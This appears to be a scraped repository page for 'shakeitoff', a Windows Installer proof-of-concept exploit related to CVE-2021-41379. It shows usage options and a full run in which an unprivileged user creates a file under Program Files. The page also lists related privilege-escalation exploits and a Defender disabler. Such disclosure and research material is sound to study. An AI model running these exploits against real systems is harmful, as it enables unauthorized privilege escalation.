Windows LPE 0-day

Overview

shakeitoff

A smaller, minimized, and cleaner version of InstallerFileTakeOver aka the zero-day exploit that is a "variation" of CVE-2021-41379. This version does not pop a shell like InstallerFileTakeOver. The point of this code was to create a simpler proof of concept that more reliably demonstrates the file creation attack. This proof of concept will create the arbitrary file requested by the user (and copy itself into it to prove writablity). Demonstrating code execution is a trivial excercise left up to the reader.

To understand how the attack works, please see the AttackerKB write up.

Usage

The tool requires three parameters:

C:\Users\albinolobster\source\repos\shakeitoff\x64\Release>.\shakeitoff.exe
option "msi_path" is required
Allowed options:
  -h, --help              produce help message
  -m, --msi_path arg      The path to the MSI to install
  -i, --install_path arg  The path to install to
  -p, --target_path arg   The file to create
  1. -m - the msi to install (full path required). One is provided in this repository (and you should use it since the file paths actually matter).
  2. -i - the install path (full path required). This is where the msi is installed / the exploit goes down. The user must specify this beforehand and it must be an empty directory. The tool doesn't clean it up because it makes figuring out the bug easier. There also must be a trailing \ because I'm a monster.
  3. -p - the file to overwrite/create. Full path required.

The PoC will just copy itself into the target file.

Usage Example

C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

File Not Found

C:\Users\Public>.\shakeitoff.exe -m C:\Users\Public\shakeitoff.msi -i C:\Users\Public\lol\ -p "C:\Program Files\lol"
[+] User provided MSI path: C:\Users\Public\shakeitoff.msi
[+] The target path is: C:\Program Files\lol
[+] Create the temp directory structure we'll install into
[+] Grabbing handle to lock C:\Users\Public\lol\shakeitoff\haters.jpg
[+] Grabbing a directory handle of C:\Users\Public\lol\shakeitoff\
[+] Monitor shakeitoff\shakeitoff for an rbf file
[+] MSI install: ACTION=ADMIN REBOOT=ReallySuppress TARGETDIR=C:\Users\Public\lol\ C:\Users\Public\shakeitoff.msi
[+] Grabbing a handle to inner shakeitoff directory
[+] In callback for oplock one
[+] Opening handle to C:\Users\Public\lol\shakeitoff\8da858.rbf
[+] Creating the callback directory at C:\Users\Public\lol\cb_directory
[+] Grab a handle for the callback directry
[+] Creating a junction from C:\Users\Public\lol\cb_directory to \BaseNamedObjects\Restricted
[+] Inside callback two
[+] Release the hater.jpg handle to unlock
[+] Move the rbf file to C:\Users\Public\lol\weird_directory
[+] Move inner shakeitoff to C:\Users\Public\lol\weird_directory
[+] Move junction at C:\Users\Public\lol\cb_directory to C:\Users\Public\lol\shakeitoff
[+] Configuring symlink from \BaseNamedObjects\Restricted\8da858.rbf to \??\C:\Program Files\lol
[+] symlink created!
[+] MsiInstallProductA return value: 1603
[+] Exploit thread joined
[+] Copy into target!

C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

12/02/2021  02:01 PM           368,640 lol
               1 File(s)        368,640 bytes
               0 Dir(s)  86,015,610,880 bytes free

Credit

  • This code is influenced by the original exploit published by Abdelhamid Naceri (also the original vulnerability discoverer!).
  • The FileOpLock code is a (slight modified) version pulled out of angrypolarbearbug2
  • Taylor Swift
Issues
  • Update AIP File To Compile Under Freeware Version

    Update AIP File To Compile Under Freeware Version

    By updating this file, you remove the line (Evaluation Version) from being added to all the binaries, making them smaller, and you also prevent Advanced Installer from prompting you to start a license trial and thinking that you need a valid license or license trial to compile the MSI when in reality you aren't using any of the paid features and Advanced Installer is just reading this part of the XML file and going "Oh the file says this so we must need a valid license file or trial to compile the product".

    Don't ask me why the product doesn't have a better way of determining the requirements for licensing, I really have no idea why it decided that a line in an XML file is the primary determinant of what feature are required as I know there are better ways to do things, but it is what it is.

    This also allows people to be compliant with the license requirements which state that:

    2.2 Trial Period License. You may download and use the Software for free for thirty (30) days after installation ("Trial Period"). During the Trial Period, Caphyon grants You a limited, non-exclusive, non-transferable, non-renewable license to copy and use the Software for evaluation purposes only and not for any commercial use. At Caphyon's discretion, Caphyon may provide limited support through email or discussion forums at Caphyon web site. The evaluation copy of the Software contains a feature that will automatically disable the Software at the end of Trial Period. Caphyon will have no liability to you if this feature disables the Software.
    

    Note that it explicitly states for evaluation purpose only and not for commercial use, whereas the freeware version states:

    2.1 Freeware Features License. Caphyon grants you an unlimited license to use the Freeware Features of the Software. The install packages created using only the Freeware Features can be freely redistributed and used both in commercial and non-commercial purpose.
    

    Or as a TLDR: we aren't using any paid features but due to this file it thinks we are. Since the freeware version doesn't impose any restrictions and we aren't using any paid features that require a paid license this kills two birds with one stone by complying with licensing and also prevents people accidentally starting a trial when they don't need to.

    opened by gwillcox-r7 1
My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal.

CVE-2021-40449 My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal. short wu along with the UAF vulnerabilty other

hakivvi 29 Jun 15, 2022
CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still a zero day

WindowsMDM-LPE-0Day Works best on Windows 11 CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still

Exploit Blizzard 24 May 1, 2022
PoC (DoS) for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell DoS PoC for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 406 Jun 21, 2022
Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell Exploit for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 406 Jun 21, 2022
win32k LPE bypass CVE-2021-1732

CVE-2022-21882 win32k LPE bypass CVE-2021-1732 Test only tested on windows 20h2 19042.1415 tested on windows 21H1 (not working) Download https://raw.g

null 6 Apr 12, 2022
Send messages to a LED Matrix display through Telegram. Inspired by a tweet from Smarter Every Day

Send messages to a LED Matrix display through Telegram. Inspired by a tweet from Smarter Every Day

Brian Lough 22 Jun 13, 2022
A modern-day Boss Key software tool. Switch instantly from work to play & play to work with Bosky.

Bosky By: Seanpm2001, Bosky-dev Et; Al. Top README.md Read this article in a different language Sorted by: A-Z Sorting options unavailable ( af Afrika

Sean P. Myrick V19.1.7.2 1 Nov 11, 2021
CVE-2021-4034 One day for the polkit privilege escalation exploit

CVE-2021-4034 One day for the polkit privilege escalation exploit Just execute make, ./cve-2021-4034 and enjoy your root shell. The original advisory

Davide Berardi 1.6k Jun 22, 2022
Implements a Windows service (in a DLL) that removes the rounded corners for windows in Windows 11

ep_dwm Implements a Windows service that removes the rounded corners for windows in Windows 11. Tested on Windows 11 build 22000.434. Pre-compiled bin

Valentin-Gabriel Radu 16 Jun 18, 2022
Windows 2000 styled installer for Panther based distributions of Microsoft Windows (WIM files).

An advanced installer for Microsoft Windows that mimics the looks of the Windows XP and older installers. Takes any modern (Vista and newer) Windows ISO or WIM file and creates a old styled Windows Setup experience on the go.

null 2 Mar 17, 2022
Windows kernel information leakage POCs on Windows 10 RS1+

This repository covers various techniques and methods I write while conducting research into infoleaks, these are for leaking various Windows kernel a

null 2 Jun 15, 2022
Some extensions for windows explorer, tested on windows 10+

WindowsExplorerExtension Extensions for windows explorer, tested on windows 10 & windows 11. New Folder Extension What's This A Gnome nautilus inspire

anpho 4 Jan 13, 2022
Defender-control - An open-source windows defender manager. Now you can disable windows defender permanently.

Defender Control Open source windows defender disabler. Now you can disable windows defender permanently! Tested from Windows 10 20H2. Also working on

null 292 Jun 27, 2022
Windows 7/2008 R2 EoP

Windows RpcEptMapper Service EoP exploit Clément Labro (@itm4n) released in November 12, 2020 all the details for a vulnerability on Windows 7 and Win

neosysforensics 13 Mar 29, 2021
Gaming Input Peripherals Device Firewall for Windows.

HidHide ⚠️ Compiling a signed BETA release is in the works, please be patient! ⚠️ Introduction Microsoft Windows offers support for a wide range of hu

Virtual Gamepad Emulation Framework 261 Jun 20, 2022
Asteroids Clone for Windows

Asteroids Clone for Windows This game is a simple Asteroids clone primarily intended to demonstrate the capabilities and flexibility of w64devkit. It

Christopher Wellons 16 Jun 21, 2022
A program that allows you to hide certain windows when sharing your full screen

Invisiwind Invisiwind (short for Invisible Window) is an application that allows you to hide certain windows when sharing your full screen.

Joshua T. 56 May 25, 2022
A beginner friendly desktop UI for Tasmota flashed devices for Windows, macOS and Linux.

TasmoManager A beginner friendly desktop UI for Tasmota flashed devices for Windows, macOS and Linux. Features Native Tasmota device discovery (via ta

Tom Butcher 43 Jun 16, 2022
Slackware for Windows Subsystem for Linux (WSL)

WSLackware: Slackware on Windows! Slackware for Windows Subsystem for Linux (WSL) WSLackware is an unofficial version of Slackware for Windows Subsyst

Mohsen Seifi 38 Jun 24, 2022